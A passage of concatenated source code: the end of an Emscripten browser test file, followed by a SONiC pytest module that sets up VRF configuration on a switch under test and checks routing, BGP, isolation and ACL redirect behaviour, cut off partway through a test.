self.run_browser('test.html', None, '/report_result?0')
assert os.path.exists('test.js') and not os.path.exists('test.worker.js')
def test_access_file_after_heap_resize(self):
open('test.txt', 'w').write('hello from file')
open('page.c', 'w').write(self.with_report_result(open(path_from_root('tests', 'access_file_after_heap_resize.c'), 'r').read()))
Popen([PYTHON, EMCC, 'page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--preload-file', 'test.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
open(self.in_dir('main.cpp'), 'w').write(self.with_report_result(r'''
int main() {
REPORT_RESULT(0);
return 0;
}
'''))
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
subprocess.check_output([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
test_vrf.py
import sys
import time
import threading
import Queue
import yaml
import json
import random
import logging
import tempfile
import traceback
from collections import OrderedDict
from natsort import natsorted
from netaddr import IPNetwork
import pytest
from tests.common.fixtures.ptfhost_utils import copy_ptftests_directory # lgtm[py/unused-import]
from tests.common.fixtures.ptfhost_utils import change_mac_addresses # lgtm[py/unused-import]
from tests.common.storage_backend.backend_utils import skip_test_module_over_backend_topologies # lgtm[py/unused-import]
from tests.ptf_runner import ptf_runner
from tests.common.utilities import wait_until
from tests.common.reboot import reboot
"""
During vrf testing, a basic vrf configuration needs to be set up before any tests
and cleaned up after all tests. Both tasks should run only once.
A module-scoped fixture `setup_vrf` is added to accomplish the setup/cleanup tasks.
We want to use ansible_adhoc/tbinfo fixtures during the setup/cleanup stages, but
1. Injecting fixtures into xunit-style setup/teardown functions is not supported as of
[now](https://github.com/pytest-dev/pytest/issues/5289).
2. Calling a fixture function directly is deprecated.
So, we prefer a fixture rather than xunit-style setup/teardown functions.
"""
pytestmark = [
pytest.mark.topology('t0')
]
logger = logging.getLogger(__name__)
# global variables
g_vars = {}
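# Path on the ptf host of a json map {ptf_port_index: {'target_dut', 'target_mac'}},
# rendered by the ptf_test_port_map fixture below and consumed by the vrf_test PTF scripts.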
PTF_TEST_PORT_MAP = '/root/ptf_test_port_map.json'
# helper functions
def get_vlan_members(vlan_name, cfg_facts):
tmp_member_list = []
for m in cfg_facts['VLAN_MEMBER'].keys():
v, port = m.split('|')
if vlan_name == v:
tmp_member_list.append(port)
return natsorted(tmp_member_list)
def get_pc_members(portchannel_name, cfg_facts):
tmp_member_list = []
for m in cfg_facts['PORTCHANNEL_MEMBER'].keys():
pc, port = m.split('|')
if portchannel_name == pc:
tmp_member_list.append(port)
return natsorted(tmp_member_list)
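# Return the ip addresses configured on an interface, looked up from the CONFIG_DB table
# that matches its name prefix, split into {'ipv4': [...], 'ipv6': [...]} of IPNetwork objects.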
def get_intf_ips(interface_name, cfg_facts):
prefix_to_intf_table_map = {
'Vlan': 'VLAN_INTERFACE',
'PortChannel': 'PORTCHANNEL_INTERFACE',
'Ethernet': 'INTERFACE',
'Loopback': 'LOOPBACK_INTERFACE'
}
intf_table_name = None
ip_facts = {
'ipv4': [],
'ipv6': []
}
for pfx, t_name in prefix_to_intf_table_map.iteritems():
if pfx in interface_name:
intf_table_name = t_name
break
if intf_table_name is None:
return ip_facts
for intf in cfg_facts[intf_table_name]:
if '|' in intf:
if_name, ip = intf.split('|')
if if_name == interface_name:
ip = IPNetwork(ip)
if ip.version == 4:
ip_facts['ipv4'].append(ip)
else:
ip_facts['ipv6'].append(ip)
return ip_facts
def get_cfg_facts(duthost):
tmp_facts = json.loads(duthost.shell("sonic-cfggen -d --print-data")['stdout']) # return config db contents(running-config)
port_name_list_sorted = natsorted(tmp_facts['PORT'].keys())
port_index_map = {}
for idx, val in enumerate(port_name_list_sorted):
port_index_map[val] = idx
tmp_facts['config_port_indices'] = port_index_map
return tmp_facts
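# Build {vrf_name: {interface: ip_facts}} from the CONFIG_DB interface tables; only the
# top-level entries (without '|') carry the vrf_name binding, while the '|'-keyed entries hold the ips.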
def get_vrf_intfs(cfg_facts):
intf_tables = ['INTERFACE', 'PORTCHANNEL_INTERFACE', 'VLAN_INTERFACE', 'LOOPBACK_INTERFACE']
vrf_intfs = {}
for table in intf_tables:
for intf, attrs in cfg_facts.get(table, {}).iteritems():
if '|' not in intf:
vrf = attrs['vrf_name']
if vrf not in vrf_intfs:
vrf_intfs[vrf] = {}
vrf_intfs[vrf][intf] = get_intf_ips(intf, cfg_facts)
return vrf_intfs
def get_vrf_ports(cfg_facts):
'''
:return: vrf_intf_member_port_indices, vrf_member_port_indices
'''
vlan_member = cfg_facts['VLAN_MEMBER'].keys()
pc_member = cfg_facts['PORTCHANNEL_MEMBER'].keys()
member = vlan_member + pc_member
vrf_intf_member_port_indices = {}
vrf_member_port_indices = {}
vrf_intfs = get_vrf_intfs(cfg_facts)
for vrf, intfs in vrf_intfs.iteritems():
vrf_intf_member_port_indices[vrf] = {}
vrf_member_port_indices[vrf] = []
for intf in intfs:
vrf_intf_member_port_indices[vrf][intf] = natsorted(
[ cfg_facts['config_port_indices'][m.split('|')[1]] for m in filter(lambda m: intf in m, member) ]
)
vrf_member_port_indices[vrf].extend(vrf_intf_member_port_indices[vrf][intf])
vrf_member_port_indices[vrf] = natsorted(vrf_member_port_indices[vrf])
return vrf_intf_member_port_indices, vrf_member_port_indices
def ex_ptf_runner(ptf_runner, exc_queue, **kwargs):
'''
With this simple wrapper function, we can use a Queue to store
exception info and check it later in the main thread.
Example:
refer to test 'test_vrf_swss_warm_reboot'
'''
try:
ptf_runner(**kwargs)
except Exception:
exc_queue.put(sys.exc_info())
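# Minimal usage sketch (this mirrors test_vrf_swss_warm_reboot below):
#   exc_que = Queue.Queue()
#   t = threading.Thread(target=ex_ptf_runner,
#                        kwargs={'ptf_runner': partial_ptf_runner, 'exc_queue': exc_que, ...})
#   t.start()   # background traffic
#   ...         # trigger the warm reboot
#   t.join()
#   if exc_que.qsize() != 0:   # any exception from ptf_runner was stashed here
#       fail the test with the stored sys.exc_info()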
def finalize_warmboot(duthost, comp_list=None, retry=30, interval=5):
'''
Poll until the given components report warmboot state 'reconciled' in STATE_DB; return the components that did not reconcile in time.
'''
DEFAULT_COMPONENT_LIST = ['orchagent', 'neighsyncd']
EXP_STATE = 'reconciled'
comp_list = comp_list or DEFAULT_COMPONENT_LIST
# wait up to $retry * $interval secs
for _ in range(retry):
for comp in list(comp_list):  # iterate over a copy so the remove() below does not skip entries
state = duthost.shell('/usr/bin/redis-cli -n 6 hget "WARM_RESTART_TABLE|{}" state'.format(comp), module_ignore_errors=True)['stdout']
logger.info("{} : {}".format(comp, state))
if EXP_STATE == state:
comp_list.remove(comp)
if len(comp_list) == 0:
break
time.sleep(interval)
logger.info("Slept {} seconds!".format(interval))
return comp_list
def check_interface_status(duthost, up_ports):
intf_facts = duthost.interface_facts(up_ports=up_ports)['ansible_facts']
if len(intf_facts['ansible_interface_link_down_ports']) != 0:
logger.info("Some ports went down: {} ...".format(intf_facts['ansible_interface_link_down_ports']))
return False
return True
def check_bgp_peer_state(duthost, vrf, peer_ip, expected_state):
peer_info = json.loads(duthost.shell("vtysh -c 'show bgp vrf {} neighbors {} json'".format(vrf, peer_ip))['stdout'])
logger.debug("Vrf {} bgp peer {} infos: {}".format(vrf, peer_ip, peer_info))
try:
peer_state = peer_info[peer_ip].get('bgpState', 'Unknown')
except Exception as e:
peer_state = 'Unknown'
if peer_state != expected_state:
logger.info("Vrf {} bgp peer {} is {}, exptected {}!".format(vrf, peer_ip, peer_state, expected_state))
return False
return True
def check_bgp_facts(duthost, cfg_facts):
result = {}
for neigh in cfg_facts['BGP_NEIGHBOR']:
if '|' not in neigh:
vrf = 'default'
peer_ip = neigh
else:
vrf, peer_ip = neigh.split('|')
result[(vrf, peer_ip)] = check_bgp_peer_state(duthost, vrf, peer_ip, expected_state='Established')
return all(result.values())
def setup_vrf_cfg(duthost, localhost, cfg_facts):
'''
setup vrf configuration on dut before test suite
'''
# FIXME
# For vrf testing, we should create a new vrf topology,
# perhaps named 't0-vrf', deployed with minigraph templates.
#
# But currently the vrf related schema is not properly defined in minigraph.
# So we generate and deploy the basic vrf configuration with a vrf jinja2 template;
# later this should move to minigraph or a better approach (VRF and BGP CLI).
from copy import deepcopy
cfg_t0 = deepcopy(cfg_facts)
cfg_t0.pop('config_port_indices', None)
# get members from Vlan1000, and move half of them to Vlan2000 in vrf basic cfg
ports = get_vlan_members('Vlan1000', cfg_facts)
vlan_ports = {'Vlan1000': ports[:len(ports)/2],
'Vlan2000': ports[len(ports)/2:]}
extra_vars = {'cfg_t0': cfg_t0,
'vlan_ports': vlan_ports}
duthost.host.options['variable_manager'].extra_vars.update(extra_vars)
duthost.template(src="vrf/vrf_config_db.j2", dest="/tmp/config_db_vrf.json")
duthost.shell("cp /tmp/config_db_vrf.json /etc/sonic/config_db.json")
reboot(duthost, localhost)
def setup_vlan_peer(duthost, ptfhost, cfg_facts):
'''
Set up vlan peer ip addresses on the peer ports (ptf).
Example:
vid       local-port  peer-port  peer-macvlan-dev  peer-namespace  peer-ip
Vlan1000  Ethernet1   eth1       e1mv1             ns1000          192.168.0.2/21
                                                                   FC00:192::2/117
Vlan2000  Ethernet13  eth13      e13mv1            ns2000          192.168.0.2/21
                                                                   FC00:192::2/117
'''
vlan_peer_ips = {}
vlan_peer_vrf2ns_map = {}
for vlan in cfg_facts['VLAN'].keys():
ns = 'ns' + vlan.strip('Vlan')
vrf = cfg_facts['VLAN_INTERFACE'][vlan]['vrf_name']
vlan_peer_vrf2ns_map[vrf] = ns
vlan_port = get_vlan_members(vlan, cfg_facts)[0]
vlan_peer_port = cfg_facts['config_port_indices'][vlan_port]
# deploy peer namespace on ptf
ptfhost.shell("ip netns add {}".format(ns))
# bind port to namespace
ptfhost.shell("ip link add e{}mv1 link eth{} type macvlan mode bridge".format(vlan_peer_port, vlan_peer_port))
ptfhost.shell("ip link set e{}mv1 netns {}".format(vlan_peer_port, ns))
ptfhost.shell("ip netns exec {} ip link set dev e{}mv1 up".format(ns, vlan_peer_port))
# setup peer ip on ptf
if (vrf, vlan_peer_port) not in vlan_peer_ips:
vlan_peer_ips[(vrf, vlan_peer_port)] = {'ipv4': [], 'ipv6': []}
vlan_ips = get_intf_ips(vlan, cfg_facts)
for ver, ips in vlan_ips.iteritems():
for ip in ips:
neigh_ip = IPNetwork("{}/{}".format(ip.ip+1, ip.prefixlen))
ptfhost.shell("ip netns exec {} ip address add {} dev e{}mv1".format(ns, neigh_ip, vlan_peer_port))
# ping to trigger neigh resolving
ping_cmd = 'ping' if neigh_ip.version == 4 else 'ping6'
duthost.shell("{} -I {} {} -c 1 -f -W1".format(ping_cmd, vrf, neigh_ip.ip), module_ignore_errors=True)
vlan_peer_ips[(vrf, vlan_peer_port)][ver].append(neigh_ip)
return vlan_peer_ips, vlan_peer_vrf2ns_map
def cleanup_vlan_peer(ptfhost, vlan_peer_vrf2ns_map):
for vrf, ns in vlan_peer_vrf2ns_map.iteritems():
ptfhost.shell("ip netns del {}".format(ns))
def gen_vrf_fib_file(vrf, tbinfo, ptfhost, render_file, dst_intfs=None, \
limited_podset_number=10, limited_tor_number=10):
dst_intfs = dst_intfs if dst_intfs else get_default_vrf_fib_dst_intfs(vrf, tbinfo)
extra_vars = {
'testbed_type': tbinfo['topo']['name'],
'props': g_vars['props'],
'intf_member_indices': g_vars['vrf_intf_member_port_indices'][vrf],
'dst_intfs': dst_intfs,
'limited_podset_number': limited_podset_number,
'limited_tor_number': limited_tor_number
}
ptfhost.host.options['variable_manager'].extra_vars.update(extra_vars)
ptfhost.template(src="vrf/vrf_fib.j2", dest=render_file)
def get_default_vrf_fib_dst_intfs(vrf, tbinfo):
'''
Get the default vrf fib destination interfaces (PortChannels) for the given vrf.
The test configuration is dynamic and works with either 4 or 8 PortChannels, depending on the number of VMs.
The first half of the PortChannels belong to Vrf1 and the second half to Vrf2.
'''
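# For example, with 8 VMs this yields PortChannel0001..PortChannel0004 for Vrf1
# and PortChannel0005..PortChannel0008 for Vrf2.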
dst_intfs = []
vms_num = len(tbinfo['topo']['properties']['topology']['VMs'])
if vrf == 'Vrf1':
dst_intfs_range = list(range(1, int(vms_num / 2) + 1))
else:
dst_intfs_range = list(range(int(vms_num / 2) + 1, vms_num + 1))
for intfs_num in dst_intfs_range:
dst_intfs.append('PortChannel000{}'.format(intfs_num))
return dst_intfs
def gen_vrf_neigh_file(vrf, ptfhost, render_file):
extra_vars = {
'intf_member_indices': g_vars['vrf_intf_member_port_indices'][vrf],
'intf_ips': g_vars['vrf_intfs'][vrf]
}
ptfhost.host.options['variable_manager'].extra_vars.update(extra_vars)
ptfhost.template(src="vrf/vrf_neigh.j2", dest=render_file)
def gen_specific_neigh_file(dst_ips, dst_ports, render_file, ptfhost):
dst_ports = [str(port) for port_list in dst_ports for port in port_list]
tmp_file = tempfile.NamedTemporaryFile()
for ip in dst_ips:
tmp_file.write('{} [{}]\n'.format(ip, ' '.join(dst_ports)))
tmp_file.flush()
ptfhost.copy(src=tmp_file.name, dest=render_file)
# For dualtor
def get_dut_enabled_ptf_ports(tbinfo, hostname):
dut_index = str(tbinfo['duts_map'][hostname])
ptf_ports = set(tbinfo['topo']['ptf_map'][dut_index].values())
disabled_ports = set()
if dut_index in tbinfo['topo']['ptf_map_disabled']:
disabled_ports = set(tbinfo['topo']['ptf_map_disabled'][dut_index].values())
return ptf_ports - disabled_ports
# For dualtor
def get_dut_vlan_ptf_ports(mg_facts):
ports = set()
for vlan in mg_facts['minigraph_vlans']:
for member in mg_facts['minigraph_vlans'][vlan]['members']:
ports.add(mg_facts['minigraph_port_indices'][member])
return ports
# fixtures
@pytest.fixture(scope="module")
def dut_facts(duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
return duthost.facts
@pytest.fixture(scope="module")
def cfg_facts(duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
return get_cfg_facts(duthost)
def restore_config_db(localhost, duthost, ptfhost):
# In case something went wrong in previous reboot, wait until the DUT is accessible to ensure that
# the `mv /etc/sonic/config_db.json.bak /etc/sonic/config_db.json` is executed on DUT.
# If the DUT is still inaccessible after the timeout, we may have already lost the DUT. Something sad happened.
localhost.wait_for(host=g_vars["dut_ip"],
port=22,
state='started',
search_regex='OpenSSH_[\\w\\.]+ Debian',
timeout=180)  # Similar approach to increase the chance that the next line gets executed.
duthost.shell("mv /etc/sonic/config_db.json.bak /etc/sonic/config_db.json")
reboot(duthost, localhost)
if 'vlan_peer_vrf2ns_map' in g_vars:
cleanup_vlan_peer(ptfhost, g_vars['vlan_peer_vrf2ns_map'])
@pytest.fixture(scope="module", autouse=True)
def setup_vrf(tbinfo, duthosts, rand_one_dut_hostname, ptfhost, localhost, skip_test_module_over_backend_topologies):
duthost = duthosts[rand_one_dut_hostname]
# backup config_db.json
duthost.shell("mv /etc/sonic/config_db.json /etc/sonic/config_db.json.bak")
## Setup global variables
global g_vars
try:
## Setup dut
g_vars["dut_ip"] = duthost.host.options["inventory_manager"].get_host(duthost.hostname).vars["ansible_host"]
duthost.critical_services = ["swss", "syncd", "database", "teamd", "bgp"] # Don't care about 'pmon' and 'lldp' here
cfg_t0 = get_cfg_facts(duthost) # generate cfg_facts for t0 topo
setup_vrf_cfg(duthost, localhost, cfg_t0)
# Generate cfg_facts for t0-vrf topo, should not use cfg_facts fixture here. Otherwise, the cfg_facts
# fixture will be executed before setup_vrf and will have the original non-VRF config facts.
cfg_facts = get_cfg_facts(duthost)
duthost.shell("sonic-clear arp")
duthost.shell("sonic-clear nd")
duthost.shell("sonic-clear fdb all")
with open("../ansible/vars/topo_{}.yml".format(tbinfo['topo']['name']), 'r') as fh:
g_vars['topo_properties'] = yaml.safe_load(fh)
g_vars['props'] = g_vars['topo_properties']['configuration_properties']['common']
g_vars['vlan_peer_ips'], g_vars['vlan_peer_vrf2ns_map'] = setup_vlan_peer(duthost, ptfhost, cfg_facts)
g_vars['vrf_intfs'] = get_vrf_intfs(cfg_facts)
g_vars['vrf_intf_member_port_indices'], g_vars['vrf_member_port_indices'] = get_vrf_ports(cfg_facts)
except Exception as e:
# Ensure that config_db is restored.
# If exception is raised in setup, the teardown code won't be executed. That's why we need to capture
# exception and do cleanup here in setup part (code before 'yield').
logger.error("Exception raised in setup: {}".format(repr(e)))
logger.error(json.dumps(traceback.format_exception(*sys.exc_info()), indent=2))
restore_config_db(localhost, duthost, ptfhost)
# Setup failed. There is no point to continue running the cases.
pytest.fail("VRF testing setup failed") # If this line is hit, script execution will stop here
# --------------------- Testing -----------------------
yield
# --------------------- Teardown -----------------------
restore_config_db(localhost, duthost, ptfhost)
@pytest.fixture
def partial_ptf_runner(request, ptfhost, tbinfo, dut_facts):
def _partial_ptf_runner(testname, **kwargs):
params = {'testbed_type': tbinfo['topo']['name'],
'router_macs': [dut_facts['router_mac']],
'ptf_test_port_map': PTF_TEST_PORT_MAP
}
params.update(kwargs)
ptf_runner(host=ptfhost,
testdir="ptftests",
platform_dir="ptftests",
testname=testname,
params=params,
log_file="/tmp/{}.{}.log".format(request.cls.__name__, request.function.__name__))
return _partial_ptf_runner
@pytest.fixture(scope="module")
def mg_facts(duthosts, rand_one_dut_hostname, tbinfo):
duthost = duthosts[rand_one_dut_hostname]
mg_facts = duthost.get_extended_minigraph_facts(tbinfo)
return mg_facts
# For dualtor
@pytest.fixture(scope='module')
def vlan_mac(duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
config_facts = duthost.config_facts(host=duthost.hostname, source='running')['ansible_facts']
dut_vlan_mac = None
for vlan in config_facts.get('VLAN', {}).values():
if 'mac' in vlan:
logger.debug('Found VLAN mac')
dut_vlan_mac = vlan['mac']
break
if not dut_vlan_mac:
logger.debug('No VLAN mac, use default router_mac')
dut_vlan_mac = duthost.facts['router_mac']
return dut_vlan_mac
@pytest.fixture(scope="module", autouse=True)
def ptf_test_port_map(tbinfo, duthosts, mg_facts, ptfhost, rand_one_dut_hostname, vlan_mac):
duthost = duthosts[rand_one_dut_hostname]
ptf_test_port_map = {}
enabled_ptf_ports = get_dut_enabled_ptf_ports(tbinfo, duthost.hostname)
vlan_ptf_ports = get_dut_vlan_ptf_ports(mg_facts)
for port in enabled_ptf_ports:
if port in vlan_ptf_ports:
target_mac = vlan_mac
else:
target_mac = duthost.facts['router_mac']
ptf_test_port_map[str(port)] = {
'target_dut': 0,
'target_mac': target_mac
}
ptfhost.copy(content=json.dumps(ptf_test_port_map), dest=PTF_TEST_PORT_MAP)
# tests
class TestVrfCreateAndBind():
def test_vrf_in_kernel(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
# verify vrf in kernel
res = duthost.shell("ip link show type vrf | grep Vrf")
for vrf in cfg_facts['VRF'].keys():
assert vrf in res['stdout'], "%s should be created in kernel!" % vrf
for vrf, intfs in g_vars['vrf_intfs'].iteritems():
for intf in intfs:
res = duthost.shell("ip link show %s" % intf)
assert vrf in res['stdout'], "The master dev of interface %s should be %s !" % (intf, vrf)
def test_vrf_in_appl_db(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
# verify vrf in app_db
for vrf in cfg_facts['VRF'].keys():
res = duthost.shell("redis-cli -n 0 keys VRF_TABLE:%s" % vrf)
assert vrf in res['stdout'], "%s should be added in APPL_DB!" % vrf
for vrf, intfs in g_vars['vrf_intfs'].iteritems():
for intf in intfs:
res = duthost.shell("redis-cli -n 0 hgetall \"INTF_TABLE:%s\"" % intf)
assert vrf in res['stdout'], "The vrf of interface %s should be %s !" % (intf, vrf)
def test_vrf_in_asic_db(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
# verify vrf in asic_db
vrf_count = len(cfg_facts['VRF'].keys()) + 1 # plus default virtual router
res = duthost.shell("redis-cli -n 1 keys *VIRTUAL_ROUTER*")
assert len(res['stdout_lines']) == vrf_count
class TestVrfNeigh():
def test_ping_lag_neigh(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
for neigh in cfg_facts['BGP_NEIGHBOR']:
if '|' not in neigh:
continue
vrf, neigh_ip = neigh.split('|')
if IPNetwork(neigh_ip).version == 4:
ping_cmd = 'ping'
else:
ping_cmd = 'ping6'
cmd = "{} {} -I {} -c 3 -f".format(ping_cmd, neigh_ip, vrf)
duthost.shell(cmd)
def test_ping_vlan_neigh(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
for (vrf, _), neigh_ips in g_vars['vlan_peer_ips'].iteritems():
for ver, ips in neigh_ips.iteritems():
ping_cmd = 'ping' if ver == 'ipv4' else 'ping6'
for ip in ips:
duthost.shell("{} {} -c 3 -I {} -f".format(ping_cmd, ip.ip, vrf))
def test_vrf1_neigh_ip_fwd(self, ptfhost, partial_ptf_runner):
gen_vrf_neigh_file('Vrf1', ptfhost, render_file="/tmp/vrf1_neigh.txt")
partial_ptf_runner(
testname="vrf_test.FwdTest",
fib_info_files=["/tmp/vrf1_neigh.txt"],
src_ports=g_vars['vrf_member_port_indices']['Vrf1']
)
def test_vrf2_neigh_ip_fwd(self, ptfhost, partial_ptf_runner):
gen_vrf_neigh_file('Vrf2', ptfhost, render_file="/tmp/vrf2_neigh.txt")
partial_ptf_runner(
testname="vrf_test.FwdTest",
fib_info_files=["/tmp/vrf2_neigh.txt"],
src_ports=g_vars['vrf_member_port_indices']['Vrf2']
)
class TestVrfFib():
@pytest.fixture(scope="class", autouse=True)
def setup_fib_test(self, ptfhost, tbinfo):
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
render_file='/tmp/vrf1_fib.txt')
gen_vrf_fib_file('Vrf2', tbinfo, ptfhost,
render_file='/tmp/vrf2_fib.txt')
def test_show_bgp_summary(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
props = g_vars['props']
route_count = props['podset_number'] * props['tor_number'] * props['tor_subnet_number']
for vrf in cfg_facts['VRF']:
bgp_summary_string = duthost.shell("vtysh -c 'show bgp vrf {} summary json'".format(vrf))['stdout']
bgp_summary = json.loads(bgp_summary_string)
for info in bgp_summary:
for peer, attr in bgp_summary[info]['peers'].iteritems():
prefix_count = attr['pfxRcd']
# skip ipv6 peers under 'ipv4Unicast' and compare only ipv4 peers under 'ipv4Unicast', and ipv6 peers under 'ipv6Unicast'
if info == "ipv4Unicast" and attr['idType'] == 'ipv6':
continue
else:
assert int(prefix_count) == route_count, "%s should have received %s route prefixes!" % (peer, route_count)
def test_vrf1_fib(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/vrf1_fib.txt"],
src_ports=g_vars['vrf_member_port_indices']['Vrf1']
)
def test_vrf2_fib(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/vrf2_fib.txt"],
src_ports=g_vars['vrf_member_port_indices']['Vrf2']
)
class TestVrfIsolation():
@pytest.fixture(scope="class", autouse=True)
def setup_vrf_isolation(self, ptfhost, tbinfo):
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
render_file='/tmp/vrf1_fib.txt')
gen_vrf_fib_file('Vrf2', tbinfo, ptfhost,
render_file='/tmp/vrf2_fib.txt')
gen_vrf_neigh_file('Vrf1', ptfhost, render_file="/tmp/vrf1_neigh.txt")
gen_vrf_neigh_file('Vrf2', ptfhost, render_file="/tmp/vrf2_neigh.txt")
def test_neigh_isolate_vrf1_from_vrf2(self, partial_ptf_runner):
# send packets from Vrf1
partial_ptf_runner(
testname="vrf_test.FwdTest",
fib_info_files=["/tmp/vrf2_neigh.txt"],
pkt_action='drop',
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
def test_neigh_isolate_vrf2_from_vrf1(self, partial_ptf_runner):
# send packets from Vrf2
partial_ptf_runner(
testname="vrf_test.FwdTest",
fib_info_files=["/tmp/vrf1_neigh.txt"],
pkt_action='drop',
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000']
)
def test_fib_isolate_vrf1_from_vrf2(self, partial_ptf_runner):
# send packets from Vrf1
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/vrf2_fib.txt"],
pkt_action='drop',
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
def test_fib_isolate_vrf2_from_vrf1(self, partial_ptf_runner):
# send packets from Vrf2
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/vrf1_fib.txt"],
pkt_action='drop',
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000']
)
class TestVrfAclRedirect():
c_vars = {}
@pytest.fixture(scope="class", autouse=True)
def is_redirect_supported(self, duthosts, rand_one_dut_hostname):
"""
Check if switch supports acl redirect_action, if not then skip test cases
"""
duthost = duthosts[rand_one_dut_hostname]
switch_cap = duthost.switch_capabilities_facts()['ansible_facts']['switch_capabilities']['switch']
res = [capabilities for capabilities in switch_cap.values() if "REDIRECT_ACTION" in capabilities]
if not res:
pytest.skip("Switch does not support ACL REDIRECT_ACTION")
@pytest.fixture(scope="class", autouse=True)
def setup_acl_redirect(self, duthosts, rand_one_dut_hostname, cfg_facts, tbinfo):
duthost = duthosts[rand_one_dut_hostname]
# -------- Setup ----------
# make sure neighs from Vlan2000 are resolved
vlan_peer_port = g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000'][0]
vlan_neigh_ip = g_vars['vlan_peer_ips'][('Vrf2', vlan_peer_port)]['ipv4'][0]
duthost.shell("ping {} -I {} -c 3 -f".format(vlan_neigh_ip.ip, 'Vrf2'))
vrf_intf_ports = g_vars['vrf_intf_member_port_indices']
src_ports = [vrf_intf_ports['Vrf1']['Vlan1000'][0]]
dst_ports = [vrf_intf_ports['Vrf1']['PortChannel0001']]
pc1_intf_ips = get_intf_ips('PortChannel0001', cfg_facts)
pc1_v4_neigh_ips = [ str(ip.ip+1) for ip in pc1_intf_ips['ipv4'] ]
pc1_v6_neigh_ips = [ str(ip.ip+1) for ip in pc1_intf_ips['ipv6'] ]
pc2_if_name = 'PortChannel0002'
pc2_if_ips = get_intf_ips(pc2_if_name, cfg_facts)
pc2_v4_neigh_ips = [ (pc2_if_name, str(ip.ip+1)) for ip in pc2_if_ips['ipv4'] ]
pc2_v6_neigh_ips = [ (pc2_if_name, str(ip.ip+1)) for ip in pc2_if_ips['ipv6'] ]
pc_vrf2_if_name = 'PortChannel000{}'.format(len(tbinfo['topo']['properties']['topology']['VMs']))
pc_vrf2_if_ips = get_intf_ips(pc_vrf2_if_name, cfg_facts)
pc_vrf2_v4_neigh_ips = [ (pc_vrf2_if_name, str(ip.ip+1)) for ip in pc_vrf2_if_ips['ipv4'] ]
pc_vrf2_v6_neigh_ips = [ (pc_vrf2_if_name, str(ip.ip+1)) for ip in pc_vrf2_if_ips['ipv6'] ]
redirect_dst_ips = pc2_v4_neigh_ips + pc_vrf2_v4_neigh_ips
redirect_dst_ipv6s = pc2_v6_neigh_ips + pc_vrf2_v6_neigh_ips
redirect_dst_ports = []
redirect_dst_ports.append(vrf_intf_ports['Vrf1'][pc2_if_name])
redirect_dst_ports.append(vrf_intf_ports['Vrf2'][pc_vrf2_if_name])
self.c_vars['src_ports'] = src_ports
self.c_vars['dst_ports'] = dst_ports
self.c_vars['redirect_dst_ports'] = redirect_dst_ports
self.c_vars['pc1_v4_neigh_ips'] = pc1_v4_neigh_ips
self.c_vars['pc1_v6_neigh_ips'] = pc1_v6_neigh_ips
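# The ACL rules below redirect flows that would normally egress via PortChannel0001 (Vrf1)
# to PortChannel0002 and to the Vrf2 PortChannel; the tests then check that the original
# ports stop receiving the traffic and that it is balanced across the redirect ports.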
# load acl redirect configuration
extra_vars = {
'src_port': get_vlan_members('Vlan1000', cfg_facts)[0],
'redirect_dst_ips': redirect_dst_ips,
'redirect_dst_ipv6s': redirect_dst_ipv6s
}
duthost.host.options['variable_manager'].extra_vars.update(extra_vars)
duthost.template(src="vrf/vrf_acl_redirect.j2", dest="/tmp/vrf_acl_redirect.json")
duthost.shell("config load -y /tmp/vrf_acl_redirect.json")
# -------- Testing ----------
yield
# -------- Teardown ----------
duthost.shell("redis-cli -n 4 del 'ACL_RULE|VRF_ACL_REDIRECT_V4|rule1'")
duthost.shell("redis-cli -n 4 del 'ACL_RULE|VRF_ACL_REDIRECT_V6|rule1'")
duthost.shell("redis-cli -n 4 del 'ACL_TABLE|VRF_ACL_REDIRECT_V4'")
duthost.shell("redis-cli -n 4 del 'ACL_TABLE|VRF_ACL_REDIRECT_V6'")
def test_origin_ports_recv_no_pkts_v4(self, partial_ptf_runner, ptfhost):
# verify that the original dst ports no longer receive packets
gen_specific_neigh_file(self.c_vars['pc1_v4_neigh_ips'], self.c_vars['dst_ports'],
'/tmp/pc01_neigh_ipv4.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.FwdTest",
pkt_action='drop',
src_ports=self.c_vars['src_ports'],
fib_info_files=['/tmp/pc01_neigh_ipv4.txt']
)
def test_origin_ports_recv_no_pkts_v6(self, partial_ptf_runner, ptfhost):
# verify that the original dst ports no longer receive packets
gen_specific_neigh_file(self.c_vars['pc1_v6_neigh_ips'], self.c_vars['dst_ports'],
'/tmp/pc01_neigh_ipv6.txt', ptfhost)
partial_ptf_runner(
testname="vrf_test.FwdTest",
pkt_action='drop',
src_ports=self.c_vars['src_ports'],
